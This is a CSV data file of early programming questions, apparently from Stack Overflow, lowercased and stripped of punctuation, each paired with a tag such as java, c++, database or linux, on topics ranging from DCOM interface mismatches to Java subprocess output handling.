Id,Title,Tag
61520,what are the pros and cons of object databases there is a lot of information out there on objectrelational mappers and how to best avoid impedance mismatch all of which seem to be moot points if one were to use an object database  my question is why isnt this used more frequently  is it because of performance reasons or because object databases cause your data to become proprietary to your application or is it due to something else  ,database
61680,how to work around a very large 2d array in c i need to create a 2d int array of size 800x800  but doing so creates a stack overflow ha haim new to c so should i do something like a vector of vectors  and just encapsulate the 2d array into a classspecifically this array is my zbuffer in a graphics program  i need to store a z value for every pixel on the screen hence the large size of 800x800thanks,c++
61750,how to implement database engine independent paging task implement paging of database records suitable for different rdbms method should work for mainstream engines  mssql2000 oracle mysql etcplease dont post rdbms specific solutions i know how to implement this for most of the modern database engines im looking for the universal solution only temporary tables based solutions come to my mind at the momenteditim looking for sql solution not 3rd party library,database
61760,browser wysiwyg best practices i am using a rich text editor on a web page  net has feature that prevent one from posting html tags so i added a javascript snippet to change the angle brackets to and alias pair of characters before the post the alias is replaced on the server with the necessary angle bracket and then stored in the database  with xss aside what are common ways of fixing this problem ie is there a better wayif you have comments on xsscrosssite scripting im sure that will help someone,asp.net
61850,is there a way to asynchronously filter an ilist ok so there has to be a way to do this no if not id love some ideas i have two repeaters and an image inside an update panel along with some ajax dropdowns with link buttons to the left i want to update the data inside the update panel as fast as possible as values are selected from the dropdowns what do you think would be the best way to update the data the repeaters are populated by objects so if i could just filter the objects by some properties i could end up with the correct data no new data from the server is needed anyone have some ideas,c#
61870,sum of items in a collection using linq to sql i have an order class with a collection of orderdetails  the order details has a property called linetotal which gets qnty x itemprice i know how to do a new linq query of the database to find the order total but as i already have the collection of orderdetails from the db is there a simple method to return the sum of the linetotal directly from the collectionid like to add the order total as a property of my order class i imagine i could loop through the collection and calculate the sum with a for each orderorderdetail but im guessing there is a better way,linq
62110,adonet entity framework tutorials does anyone know of any good tutorials on adonet entity frameworkthere are a few useful links here at stack overflow and ive found one tutorial at jasons dotnet architecture blog but can anyone recommend any other good tutorials any tutorials available from microsoft either online or as part of any conferencecourse material,entity-framework
62230,how to save jpg image to database and then load it in delphi using fibplus and timage how do i save a jpg image to database and then load it in delphi using fibplus and timage,delphi
62340,does popback really invalidate all iterators on an stdvector stdvectorltintgt ints  fill ints with random valuesforstdvectorltintgtiterator it  intsbegin it  intsend     ifit lt 10            it  intsback        intspopback        continue        itthis code is not working because when popback is called it is invalidated but i dont find any doc talking about invalidation of iterators in stdvectorpopbackdo you have some links about that,c++
62430,regular expression that rejects all input is is possible to construct a regular expression that rejects all input strings,regex
62490,how can i get axis 14 to not generate several prefixes for the same xml namespace i am receiving soap requests from a client that uses the axis 14 libraries the requests have the following formltsoapenvenvelope xmlnssoapenvhttpschemasxmlsoaporgsoapenvelope                   xmlnsxsdhttpwwww3org2001xmlschema                   xmlnsxsihttpwwww3org2001xmlschemainstancegt  ltsoapenvbodygt    ltplaceorderrequest xmlnshttpexamplecomschemaorderrequestgt      ltordergt        ltns1requestparameter xmlnsns1httpexamplecomschemacommonrequestgt          ltns1orderingsystemwithdomaingt            ltns1orderingsystemgtinternetltns1orderingsystemgt            ltns1domainsigngt2ltns1domainsigngt          ltns1orderingsystemwithdomaingt        ltns1requestparametergt        ltns2directdeliveryaddress ns2addresstype0 ns2index1                                    xmlnsns2httpexamplecomschemaorderrequestgt          ltns3address xmlnsns3httpexamplecomschemacommonrequestgt            ltns4zipcode xmlnsns4httpexamplecomschemacommongt12345ltns4zipcodegt            ltns5city xmlnsns5httpexamplecomschemacommongtcityltns5citygt            ltns6street xmlnsns6httpexamplecomschemacommongtstreetltns6streetgt            ltns7housenum xmlnsns7httpexamplecomschemacommongt1ltns7housenumgt            ltns8country xmlnsns8httpexamplecomschemacommongtxxltns8countrygt          ltns3addressgtas you can see several prefixes are defined for the same namespace eg the namespace httpexamplecomschemacommon has the prefixes ns4 ns5 ns6 ns7 and ns8 some long requests define several hundred prefixes for the same namespacethis causes a problem with the saxon xslt processor that i use to transform the requests saxon limits the the number of different prefixes for the same namespace to 255 and throws an exception when you define more prefixescan axis 14 be configured to define smarter prefixes so that there is only one prefix for each namespace,java
62530,how to prevent ie6 from refetching alreadyfetched images added via dom manipulation if you add a image to your browsers dom ie6 will not check its cache to see if it already downloaded the image but will instead reretrieve it from the server  i have not found any combination of http response headers of the ensuing image request to convince ie6 that it can cache the image  cachecontrol expires lastmodifiedsome suggest you can return a 304 of the subsequent image requests to tell ie6 you already got it but i want to avoid the whole round trip to the server in the first place,ajax
62570,how do i move a file or folder from one folder to another in tortoisesvn i would like to move a file or folder from one place to another within the same repository without having to use repo browser to do it and without creating two independent adddelete operations  using repo browser works fine except that your code will be hanging in a broken state until you get any supporting changes checked in afterwards like the csproj file for exampleupdate people have suggested move from the command line is there a tortoisesvn equivalent,svn
62650,saving java object graphs as xml file whats the simplesttouse techonlogy available to save an arbitrary java object graph as an xml file and to be able to rehydrate the objects later,java
62720,iis crashes when serving an aspnet application under heavy load how to troubleshoot it i am working on an aspnet web application it seems to be working properly when i try to debug it in visual studio however when i emulate heavy load iis crashes without any trace  log entry in the system journal is very generic the world wide web publishing service terminated unexpectedly it has done this 4 timeshow is it possible to get more information from iis to troubleshoot this problem,debugging
62810,exceptions not passed correctly thru rcf using boostserialization i use rcf with boostserialization why use rcfs copy when we already use the original it works ok but when an exception is thrown in the server its not passed correctly to the client instead i get an rcfserializationexception quoting an archiveexception saying class name too long when i change the protocol to bstext the exceptions is unregistered class when i change the protocol to sfbinary it worksive registered remoteexception on both server and client like thisboostclassversionrcfremoteexception 0boostclassexportrcfremoteexceptioni even tried serializing and deserializing a boostsharedptrltrcfremoteexceptiongt in the same test and it worksso how can i make rcf pass exceptions correctly without resorting to sf,c++
62850,using asynchbeans instead of native jdk threads are there any performance limitations using ibms asynchbeans my apps jvm core dumps are showing numerous occurences of orphaned threads im currently using native jdk unmanaged threads is it worth changing over to managed threads,multithreading
62940,how do i get an autoscrolling text display on net forms  eg for credits need to show a credits screen where i want to acknowledge the many contributors to my application want it to be an automatically scrolling box much like the credits roll at the end of the film,.net
63030,bufferedimage in ikvm what is the best andor easiest way to replace the missing bufferedimage functionality for a java project i am converting to net with ikvmim basically getting clisystemnotimplementedexception bufferedimage exceptions when running the application which otherwise runs fine,java
63090,surrogate vs naturalbusiness keys here we go again the old argument still arises would we better have a business key as a primary key or would we rather have a surrogate id ie an sql server identity with a unique constraint on the business key field please provide examples or proof to support your theory,database
63100,scrum process management  tips pitfalls ideas ive been doing scrum with a team for a while but things seem messy for some reasons ive been thinking on how they could be changed and have a couple of questions that i would like to raise here  first what should be the role of testers designers and nondevelopers as a whole in the scrum processif they are equal to other team members a couple of issues arise designers and testers usually work on a task after development is done so they cannot adequately plan for a sprint because of this dependency  second we have deadlines these are strict and have a lot of impact on prioritization the end result is backlog changes in the middle of a sprint because of deadline changes or bad results in the end of the sprintwe also have a lot of nontechnical work like customer support that has to be done in the meantime and cannot be planned as it varies a lotso im thinking that the team structure culture and practices are kind of not compatible with scrum scrum for me is a process management tool for teams working on the development of a single software product  what do you guys think about applying it in more specific and complicated scenarios do you have any experience to share,agile
63130,add custom textboxcell to a datagridview control that contains a button to open the filedialog i would like to add a datagridviewtextboxcell cell to a datagridviewcell control but as well as being able to type in the text cell as normal it must also contain a  button that once clicks brings up the openfiledialog window to allow the user to select a file once selected the text cell will be populated with the full file pathwhat is the best way to go about thisthanks,.net
63150,whats the best way to build a string of delimited items in java while working in a java app i recently needed to assemble a commadelimited list of values to pass to another web service without knowing how many elements there would be in advance the best i could come up with off the top of my head was something like thispublic string appendwithdelimiter string original string addition string delimiter      if  originalequals            return addition     else         return original  delimiter  addition    string parameterstring  if  condition  parameterstring  appendwithdelimiter parameterstring elementname  if  anothercondition  parameterstring  appendwithdelimiter parameterstring anotherelementname  i realize this isnt particularly efficient since there are strings being created all over the place but i was going for clarity more than optimizationin ruby i can do something like this instead which feels much more elegantparameterarray  parameterarray ltlt elementname if conditionparameterarray ltlt anotherelementname if anotherconditionparameterstring  parameterarrayjoinbut since java lacks a join command i couldnt figure out anything equivalentso whats the best way to do this in java,java
63390,is there a way to build a flash 9 swf from an fla file without using the flash ide two reasons this would be useful in case theres some other way to achieve these goals1 building in the flash ide is really slow i was hoping a thirdparty compiler would be faster2 it would be nice to be able to build projects on machines that dont have the flash ide installedim familiar with other as3 compilers that are out there but i dont know of any that take fla files as input,actionscript-3
63690,how do you reliably get an ip address via dhcp i work with embedded linux systems that sometimes want to get their ip address from a dhcp server  the dhcp client client we use dhcpcd has limited retry logic  if our device starts up without any dhcp server available and times out dhcpcd will exit and the device will never get an ip address until its rebooted with a dhcp server visibleconnected  i cant be the only one that has this problem  the problem doesnt even seem to be specific to embedded systems though its worse there  how do you handle this  is there a more robust client available  ,linux
63720,does vista do stricter checking of interface ids in dcom calls the stub received bad data i hope everyone will pardon the length and narrative fashion of this question  i decided to describe the situation in some detail in my blog  i later saw joels invitation to this site and i thought id paste it here to see if anyone has any insight into the situationi wrote and now support an application that consists of a visual basic thick client speaking dcom to middle tier com components written in c using atl it runs in all eight of our offices  each office hosts a backend server that contains the com application consisting of 18 separate components and the sqlserver the sqlserver is typically on the same backend server but need not bewe recently migrated the backend server in our largest office  new york  from a msc cluster to a new virtual machine hosted on vmwares esx technology since the location of the com application had moved from the old server to a new one with a different name i had to redirect all the clients so that they activated the com application on the new server the procedure was old hat as i had done essentially the same thing for several of my smaller offices that had gone through similar infrastructure upgradesall seemed routine and on monday morning the entire office  about 1000 windows xp workstations  were running without incident on the new server but then the call came from my mobile group  there was an attorney working from home with a vpn connection that was getting a strange error after being redirected to the new servererror on filltreeview2  the stub received bad datahuh i had never seen this error message before was it the new server but all the workstations in the office were working fine i told the mobile group to switch the attorney back to the old sever which was still up and the error disappeared so what was the difference turns out this attorney was running vista at homewe dont run vista in any of our offices but we do have some attorneys that run vista at home certainly some in my new york office i do as well and ive never seen this problem to confirm that there was an issue i fired up my vista laptop pointed it to the new server and got the same error i pointed it back to the old server and it worked fine clearly there was some problem with vista and the components on the new server  a problem that did not seem to affect xp clients what could it benext stop  the application error log on my laptop this yielded more information on the errorsource        microsoftwindowsrpceventsdate          922008 115607 amevent id      10level         errorcomputer      devlaptopdescription   application has failed to complete a com call because an incorrectinterface id was passed as a parameterthe expected interface id was 0000055500000010800000aa006d2ea4 the interface id returned was 0000055600000010800000aa006d2ea4user action  contact the application vendor for updated version of the applicationthe interface ids provided the clue i needed to unravel the mystery the expected interface id identifies mdacs recordset interface  specifically version 21 of that interface the returned interface corresponds to a later version of recordset version 25 which differs from version 21 by the inclusion of one additional entry at the end of the vtable  method saveindeed my components interfaces expose many methods that pass recordset as an output parameter so were they suddenly returning a later version of recordset  with a different interface id it certainly appeared to be the case and then i thought why should it matter the vtable looks the same to clients of the older interface indeed i suspect that if we were talking about inprocess com and not dcom this apparently innocuous impedance mismatch would have been silently ignored and would have caused no issuesof course when process and machine boundaries come into play there is a proxy and a stub between the client and the server in this case i was using type library marshaling with the free threaded marshaller so there were two mysteries to solvewhy was i returning a different interface in the output parameters from methods on my new serverwhy did this affect only vista clientsas my server software was hosted on servers at each of my eight offices i decided to try pointing my vista client at all of them in sequence to see which had problems with vista and which didnt illuminating test some of the older servers still worked with vista but the newer ones did not although some of the older servers were still running windows 2000 while the newer ones were at 2003 that did not seem to be the issueafter comparing the dates of the component dlls it appeared that whenever the client pointed to servers with component dlls dated before 2003 vista was fine but those that had dlls with dates after 2003 were problematic believe it or nor there were no or at least no significant changes to the code on the server components in many years apparently the differing dates were simply due to recompiles of my components on my development machines and it appeared that one of those recompiles happened in 2003the light bulb went on when passing recordsets back from server to client my atl c components refer to the interface as recordset this symbol comes from the type library embedded within msado15dll this is the line i had in the c codeimport cprogram filescommon filessystemadomsado15dll nonamespace rename  eof adoeof dont be deceived by the 15 in msdad15dll apparently this dll has not changed name in the long series of mdac versionswhen i compiled the application back in the day the version of mdac was 21 so recordset compiled with the 21 interface id and that is the interface returned by the servers running those componentsall the clients use the com application proxy that was generated i believe back in 1999 the type library that defines my interfaces includes the lineimportlibmsado21tlbwhich explains why they expect version 21 of recordset in my methods output parameters clearly the problem was with my 2003 recompile and the fact that at that time the recordset symbol no longer corresponded to version 21 indeed recordset corresponded to the 25 version with its distinct interface id the solution for me was to change all references from recordset to recordset21 in my c code i rebuilt the components and deployed them to the new server voila  the clients seemed happy againin conclusion there are two nagging questions that remain for mewhy does the proxystub infrastructure seem to behave differently with vista clients it appears that vista is making stricter checks of the interface ids coming back from method parameters than is xphow should i have coded this differently back in 1999 so that this would not have happened interfaces are supposed to be immutable and when i recompiled under a newer version of mdac i inadvertently changed my interface because the methods now returned a different recordset interface as an output parameter as far as i know the type library back then did not have a versionspecific symbol  that is later versions of the mdac type libraries define recordset21 but that symbol was not available back in the 21 type library,windows-vista
63790,vs 2003 reports unable to get the project file from the web server when opening a solution from vss when attempting to open a project from source control on a newly formatted pc i receive an unable to get the project file from the web server after getting the sln file from vss if i attempt to open the sln file from explorer i also receive the same errorany pointers or ideasthanks,visual-sourcesafe
63800,does java impose any further restrictions on filenames other than the underlying operating system does java impose any extra restrictions of its own windows upto vista does not allow names to include  lt gt   i know how to validate names a regular expressioni need to validate filenames entered by users  my application does not need to run on any other platform though of course i would prefer to be platform independent,java
63870,splitting a file and its lines under linuxbash i have a rather large file 150 million lines of 10 chars i need to split it in 150 files of 2 million lines with each output line being alternatively the first 5 characters or the last 5 characters of the source linei could do this in perl rather quickly but i was wondering if there was an easy solution using bashany ideas,linux
63910,best way to animate sprites in flex is there a preferred way to handle animation when using flex  for instance if i want to render a ball and bounce it around the screen,flex
63930,struts 13 forward outside the application context struts 13 application  main website is not served by strutsjava  i need to forward the result of a struts action to a page in the website that is outside of the struts context  currently i forward to a jsp in context and use a metarefresh to forward to the real location  that seems kinda sucky  is there a better way,java
63940,missing classes in wmi when nonadmin id like to be able to see win32physicalmedia information when logged in asa limited user in windows xp no admin rights it works ok when logged in as adminwmidiag has just given a clean bill of health and win32diskdrive classproduces information correctly but win32physicalmedia produces a count of 0for this codeset wmi  getobjectwinmgtmtsrootcimv2set objs  wmiinstancesofwin32physicalmediawscriptecho objscountalternatively if the hard disk serial number as found on the serialnumberproperty of the physical drives is available in another class which i canread as a limited user please let me know i am not attempting to write toany property with wmi but i cant read this when running as a limited userinterestingly diskdrive misses out the signature property which would do formy application when run as a limited user but is present when run from anadmin account,vbscript
63950,how to make emacs terminal colors the same as emacs gui colors i program with emacs on ubuntu hardy heron at the moment and i like the default text coloration in the emacs gui however the default text coloration when emacs is run in the terminal is different and garishhow do i make the colors in the terminal match the colors in the gui,emacs
63960,game programming and event handlers i havent programmed games for about 10 years my last experience was djgpp  allegro but i thought id check out xna over the weekend to see how it was shaping upi am fairly impressed however as i continue to piece together a game engine i have a probably basic questionhow much should you rely on cs delegates and events to drive the game as an application programmer i use delegates and events heavily but i dont know if there is a significant overhead to doing soin my game engine i have designed a chase cam of sorts that can be attached to an object and then recalculates its position relative to the object when the object moves there are two ways to update the chase camhave an updatecameras method in the main game loopuse an event handler and have the chase cam subscribe to objectonmovedim using the latter because it allows me to chain events together and nicely automate large parts of the engine suddenly what would be huge and complex get dropped down to a handful of 35 line event handlersits a beautyhowever if event handlers firing every nanosecond turn out to be a major slowdown ill remove it and go with the loop approachideas,c#
64000,draining standard error in java when launching a process from java both stderr and stdout can block on output if i dont read from the pipes  currently i have a thread that proactively reads from one and the main thread blocks on the otheris there an easy way to join the two streams or otherwise cause the subprocess to continue while not losing the data in stderr ,java
